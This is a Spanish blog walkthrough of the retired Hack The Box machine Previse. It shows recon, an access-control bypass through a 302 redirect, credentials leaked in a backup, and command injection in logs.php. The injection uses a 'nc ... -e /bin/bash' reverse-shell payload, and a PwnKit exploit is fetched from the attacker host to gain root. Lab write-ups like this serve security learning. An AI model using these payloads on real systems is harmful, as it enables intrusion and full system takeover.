Avatar Blog Personal de K0Hack sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

Maquina Retirada Previse de Hack The Box (Necesario VIP)

Previse ~ Hack The Box

Realizamos el Primer escaneo con Nmap

$" nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oG allports 10.10.10.125       "

Procedemos con el siguiente escaneo de Nmap

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
#nmap 7.91 scan initiated Fri Oct 29 10:31:39 2021 as: nmap --script http-enum -p80 -oN WebScan 10.10.11.104
Nmap scan report for 10.10.11.104
Host is up (0.044s latency).

Lanzamos el Script http-enum

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /login.php: Possible admin folder
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'

Lanzamos la herramienta Whatweb

# Nmap done at Fri Oct 29 10:31:48 2021 -- 1 IP address (1 host up) scanned in 9.17 seconds
http://10.10.11.104:80 [302 Found] Apache[2.4.29], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.11.104], Meta-Author[m4lwhere], RedirectLocation[login.php], Script, Title[Previse Home]

Fuzzeamos por posibles archivos a nivel http

Target: http://10.10.11.104/FUZZ.php
Total requests: 220548

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                           
=====================================================================

000000187:   200        31 L     60 W       1248 Ch     "nav"                                                                                                                                             
000000320:   200        5 L      14 W       217 Ch      "footer"                                                                                                                                          
000000004:   302        0 L      0 W        0 Ch        "download"                                                                                                                                        
000000002:   302        71 L     164 W      2801 Ch     "index"                                                                                                                                           
000000081:   302        112 L    263 W      4914 Ch     "files"                                                                                                                                           
000000751:   302        74 L     176 W      2966 Ch     "status"                                                                                                                                          
000000040:   200        53 L     138 W      2224 Ch     "login"                                                                                                                                           
000001212:   302        0 L      0 W        0 Ch        "logout"                                                                                                                                          
000001376:   302        93 L     238 W      3994 Ch     "accounts"                                                                                                                                        
000001477:   200        0 L      0 W        0 Ch        "config"                                                                                                                                          
000002258:   302        0 L      0 W        0 Ch        "logs"                                                                                                                                            
000000178:   200        20 L     64 W       980 Ch      "header"                                                                                                                                          
000045227:   403        9 L      28 W       277 Ch      "http://10.10.11.104/.php" 

Vemos que encontramos un 302 para recursos a nivel web, procedemos a usar Burpsuite para modificar la respuesta del Servidor de 302 a 200 OK

Probamos con el recurso encontrado accounts.php

Cambiamos la cabecera 302 Not Found --> 200 OK desde Burpsuite 
Inteceptando la respuesta del Servidor

Venmos que conseguimos entrar al recurso accounts.php saltandonos el panel login. Procemos a crear un usuario llamado admin:admin

POST /accounts.php HTTP/1.1

Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/accounts.php
Cookie: PHPSESSID=p79kvpmandld75npavcn0cra88
Upgrade-Insecure-Requests: 1

username=admin&password=admin&confirm=admin&submit=

Procedemos a salirnos al login.php inicial e intentar conectarnos como el usuario que hemos creado Vemos que accedemos correctamente

Encontramos el siguiente Menu

HOME ACCOUNTS FILES MANAGEMENT MENU ADMIN

En FILES encontramos un archivito –> SiteBackup.zip –> Procedemos a descargarnoslo a nuestra maquina atacante

# 7z x siteBackup.zip             

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-8700K CPU @ 3.70GHz (906EA),ASM,AES-NI)

Scanning the drive for archives:
1 file, 9948 bytes (10 KiB)

Extracting archive: siteBackup.zip
--
Path = siteBackup.zip
Type = zip
Physical Size = 9948

Everything is Ok

Files: 13
Size:       24047
Compressed: 9948

Vemos los diferentes recursos que encontramos a nivel del SiteBackup.zip

# tree                                  
.
├── accounts.php
├── config.php
├── download.php
├── file_logs.php
├── files.php
├── footer.php
├── header.php
├── index.php
├── login.php
├── logout.php
├── logs.php
├── nav.php
├── siteBackup.zip
└── status.php

Encontramos Credenciales en Texto Claro

# cat config.php                             
<?php

function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}

?>

Procedemos a seguir inspeccionando la web y sus menus. Nos dirigimos al MANAGEMENT MENU que tiene Dos SubMenus WebSite Status – Log Data

Procedemos a interceptar con burpsuite una peticion del Submenu – Log Data

GET /file_logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.11.104/status.php
Connection: close
Cookie: PHPSESSID=p79kvpmandld75npavcn0cra88
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Vemos que se produce un GET a file_logs.php pero tambien vemos que tenemos un Botton para ejecutar una accion comma Vemos que la peticion interceptada con Burpsuite para el recurso via Post logs.php

POST /logs.php HTTP/1.1

Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/file_logs.php
Cookie: PHPSESSID=p79kvpmandld75npavcn0cra88
Upgrade-Insecure-Requests: 1

delim=comma

Inspeccionemos el codigo fuente de este Recurso ya que vemos que en la respuesta parace que se estan ejecutando algun tipo de comando a nivel de sistema

# cat logs.php  
<?php
session_start();
if (!isset($_SESSION['user'])) {
    header('Location: login.php');
    exit;
}
?>

<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
    header('Location: login.php');
    exit;
}

/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log";    

if(file_exists($filepath)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filepath));
    ob_clean(); // Discard data in the output buffer
    flush(); // Flush system headers
    readfile($filepath);
    die();
} else {
    http_response_code(404);
    die();
} 
?>

Vemos el comentario del Desarrollador y analizamos el codigo en busca de posible Vulnerabilidad Command Injection, dado que vemnos la variable $output = EXEC("Se Tenso") Ahi tenemos un exec de un input que nosotros podemos modificar atraves del parametro Delim Procedemos a hacer la siguiente Peticion por Post

POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/file_logs.php
Cookie: PHPSESSID=p79kvpmandld75npavcn0cra88
Upgrade-Insecure-Requests: 1

"delim=comma+%26%26+nc+10.10.16.4+443+-e+/bin/bash  "

Nos ponemos a la escucha con una session de nc

# nc -vlnp 443                                                                                                                                                                                               1 ⚙
listening on [any] 443 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.104] 41780

    # script /dev/null -c bash
Script started, file is /dev/null

    # www-data@previse:/var/www/html$ ^Z
zsh: suspended  nc -vlnp 443

# stty raw -echo;fg                                                                                                                                                                                    148 ⨯ 2 ⚙
[1]  - continued  nc -vlnp 443
                              reset xterm

    # www-data@previse:/var/www/html$ export TERM=xterm
    # www-data@previse:/var/www/html$ export SHELL=bash

Enumeracion de la Maquina y Aplicacion de Una escalada De Privilegios No Convecional

www-data@previse:/tmp$ uname -a 
Linux "previse 4.15.0-151-generic" #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Escalada Alternativa a Root //PwnKit//

Nos copiamos el siguiente Repositorio –> # git clone https://github.com/ly4k/PwnKit.git Procdemos a montarnos un serividor con python3 para compartir el recurso PwnKit a la maquina victima

www-data@previse:/tmp$ wget http://10.10.16.4/PwnKit
--2022-01-30 13:31:34--  http://10.10.16.4/PwnKit
Connecting to 10.10.16.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14688 (14K) [application/octet-stream]
Saving to: 'PwnKit'

PwnKit              100%[===================>]  14.34K  --.-KB/s    in 0.1s    

2022-01-30 13:31:34 (125 KB/s) - 'PwnKit' saved [14688/14688]

Verificando que tenemos el archivo, procedemos a darle permisos para ejecutarlo

www-data@previse:/tmp$ ls
PwnKit  test
www-data@previse:/tmp$ chmod +x PwnKit 

Ejecutamos el exploit PwnKit

www-data@previse:/tmp$ ./PwnKit 
root@previse:/tmp# whoami
root

Sacando la Flag para Root

root@previse:/tmp# cd /root
root@previse:~# ls
root.txt
root@previse:~# cat root.txt 
xxxxxxxxdfadb7ab19dc709216xxxxxxxxx
root@previse:~# 

Maquina Pwned Previse PwnKit OS Injection